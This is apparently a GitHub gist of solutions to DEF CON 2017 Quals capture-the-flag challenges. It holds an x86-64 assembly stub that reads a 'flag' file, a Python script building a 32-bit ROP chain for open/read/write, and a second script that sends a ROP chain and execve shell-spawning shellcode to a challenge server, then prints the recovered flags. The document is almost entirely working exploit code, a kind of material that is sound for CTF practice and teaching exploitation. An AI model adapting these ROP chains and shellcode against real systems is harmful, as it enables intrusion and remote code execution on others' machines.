@ytn86
Last active May 1, 2017 13:56
DEFCON 2017 Quals
BITS 64
; x86-64 Linux syscall stub in three labelled stages. It relies on register
; state inherited from whatever jumps here: rax on entry is used as a file
; descriptor, and rbp is used as the base of a stack buffer.
_start:
mov rdi, rax          ; rdi <- fd taken from rax on entry
mov rax, 0x3          ; syscall 3 (sys_close on x86-64 Linux)
syscall
pop rcx               ; popped value is discarded: rcx is overwritten on the next line
mov rcx, 0x67616c66   ; "flag" as little-endian bytes; the upper 4 bytes of rcx are zero
push rcx              ; 8-byte push -> "flag\0\0\0\0" on the stack
mov rdi, rsp          ; rdi <- pointer to that NUL-terminated string
xor rsi, rsi          ; flags = 0
xor rdx, rdx          ; mode = 0
mov rax, 0x2          ; syscall 2 (sys_open on x86-64 Linux)
syscall
readflag:
mov rdi, rax          ; rdi <- fd returned by the open above
mov rsi, rbp
sub rsi, 0x80         ; buffer at rbp-0x80 (rbp inherited from the caller)
mov rdx, 0x80         ; 0x80 bytes
xor rax, rax          ; syscall 0 (sys_read on x86-64 Linux)
syscall
checkflag:
mov al, [rsi+0x32]    ; byte at offset 0x32 of the buffer
cmp al, 0x64          ; signed compare against 0x64 ('d')
jge checkflag         ; nothing in the loop changes the byte, so this spins forever while
                      ; it is >= 0x64; otherwise execution continues past this code
#! python3
import sys
# --- target-binary addresses -------------------------------------------------
bss1 = 0x80ecfc4     # buffer that exploit() uses as the read()/write() target
bss = bss1 + 140     # 140 bytes past bss1; not used by exploit()
ptr = 0x80ed02c      # not used by exploit()
buf = 0x802d02c      # not used by exploit()

# --- ROP gadget addresses ----------------------------------------------------
# Each name states the instruction the gadget is expected to execute before
# returning (e.g. pop_ebx -> "pop ebx; ret"). The binary itself is not shown
# here, so that mapping is an assumption carried over from the original names.
int80 = 0x0806fae0
pop_eax = 0x080e558a
push_eax = 0x080e789c
pop_ebx = 0x080481c9
pop_ecx = 0x080e5ee1
push_ecx = 0x080e403a
pop_edx = 0x0806f2fa
push_edx = 0x08064828
push_esp = 0x080e192d
xchg_eax_edx = 0x080e8e02
xor_eax_eax = 0x080555c0
inc_eax = 0x080e30a3
inc_ebx = 0x080e9b21
inc_ecx = 0x080e794e
inc_edx = 0x0805da67

# --- payload fragments -------------------------------------------------------
flag = b'flag'       # filename appended to the stage-1 input
gablen = 100         # padding length; exploit() currently writes the literal 100 instead
def exploit():
    """Build the stage-1 input for the 32-bit target and write it to stdout.

    The output is one byte string: a 4-byte value, 100 bytes of padding, the
    ROP chain assembled below, a './'*50 + 'flag' path, and a series of
    newline-terminated answers (presumably replies to prompts of the target
    program -- not established here).

    NOTE(review): ``pI`` is neither defined nor imported in this script. The
    companion script imports ``pQ`` from ``ctflib.util``, so ``pI`` presumably
    comes from the same helper module (a 4-byte little-endian packer, by
    analogy with ``pQ``). As pasted, calling this function raises NameError.
    """
    # open('flag', 0, 0);
    payload = b''
    payload += pI(pop_ebx)
    payload += pI(0x080ed0d6)       # ebx <- 0x080ed0d6 (per the comment above, the
                                    # filename argument; its contents are not visible here)
    payload += pI(pop_ecx)
    payload += pI(0xffffffff)
    payload += pI(inc_ecx)          # ecx <- 0xffffffff + 1, i.e. 0 with 32-bit wraparound
    payload += pI(xor_eax_eax)
    payload += pI(xor_eax_eax)
    payload += pI(xchg_eax_edx)     # edx <- 0 (eax was just zeroed); eax <- old edx
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x5)    # eax <- 5
    payload += pI(int80)
    #payload += pI(bss)
    # read(3, bss1, 0x0e0e0e0e);
    payload += pI(pop_ebx)
    payload += pI(0xffffffff)
    payload += pI(inc_ebx)*4        # ebx <- 3 (32-bit wraparound)
    payload += pI(pop_ecx)
    payload += pI(bss1)
    payload += pI(pop_edx)
    payload += pI(0x0e0e0e0e)
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x3)    # eax <- 3
    payload += pI(int80)
    # write(1, bss1, 0x0e0e0e0e);
    payload += pI(pop_ebx)
    payload += pI(0xffffffff)
    payload += pI(inc_ebx)*2        # ebx <- 1 (32-bit wraparound)
    payload += pI(pop_ecx)
    payload += pI(bss1)
    payload += pI(xor_eax_eax)      # edx is not reset here; it keeps 0x0e0e0e0e from above
    payload += pI(inc_eax)*(0x4)    # eax <- 4
    payload += pI(int80)
    payload1 = b''
    payload1 += pI(0x31457185)      # leading 4-byte value; its role is not visible here
    payload1 += b'b'*100            # padding (same length as the module-level gablen)
    payload1 += payload
    payload1 += b'./'*50            # path prefix of 50 "./" components ...
    payload1 += flag                # ... followed by "flag"
    payload1 += b'\n'
    # Remaining lines: newline-terminated answers, presumably to prompts of the
    # target program (not established here).
    payload1 += b'15\n'
    payload1 += b'y\n'
    payload1 += b'20\n'
    payload1 += b'y\n'
    payload1 += b'20\n'
    payload1 += b'y\n'
    payload1 += b'23\n'
    payload1 += b'n\n'
    sys.stdout.buffer.write(payload1)   # raw bytes, bypassing the text layer
def main():
    """Script entry point: write the stage-1 input produced by exploit() to stdout."""
    return exploit()
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
"""
The flag is: Thanks to Kenshoto for the inspiration! 5fbb34920c457b2e0855a174b8de3ebc
"""
#! python3
from ctflib import Pwn
from ctflib.util import *
import sys
import time
def exploit(cn):
    """Send the two-message exploit over ``cn`` and hand the session to the user.

    Message 1: a fixed prefix string, 33 bytes of padding, then a ROP chain
    that loads rsi=bss, rdi=0, rdx=0x30, runs ``syscall_ret`` and finally
    returns into ``bss``. The chain never sets rax, so the syscall number
    depends on whatever rax holds at that point (not established here).
    Message 2: ``sc``, raw machine code, sent one second later.

    Parameters:
        cn: connection object providing ``send`` and ``interact`` (a ``Pwn``
            from ``ctflib``; see main()).
    """
    paylen = 33               # unused: the padding length is written literally below
    pop_rdi_ret = 0x4014d6
    pop_rsi_ret = 0x4015f7
    pop_rdx_ret = 0x441e46
    main_gets = 0x4009dd      # unused in this function
    bss = 0x6ca000
    syscall_ret = 0x466815
    # 27 bytes of raw machine code; not decoded here.
    sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
    payload = b''
    payload += b'Smash me outside, how bout dAAAAAAAAAAA'   # fixed prefix expected by the target
    payload += b'b'*(33)                                      # padding (see paylen)
    payload += pQ(pop_rsi_ret)
    payload += pQ(bss)            # rsi <- bss
    payload += pQ(pop_rdi_ret)
    payload += pQ(0)              # rdi <- 0
    payload += pQ(pop_rdx_ret)
    payload += pQ(0x30)           # rdx <- 0x30
    payload += pQ(syscall_ret)    # syscall; ret
    payload += pQ(bss)            # return address after the syscall
    payload += b'\n'
    #input('aaa')
    cn.send(payload)
    time.sleep(1)                 # give the target time to consume message 1 before sc is sent
    cn.send(sc)
    cn.interact()                 # hand the session to the user
def main():
    """Connect to the challenge service and run exploit() against the session."""
    conn = Pwn()
    conn.connect('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
    exploit(conn)
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
"""
The flag is: You must be at least this tall to play DEF CON CTF
"""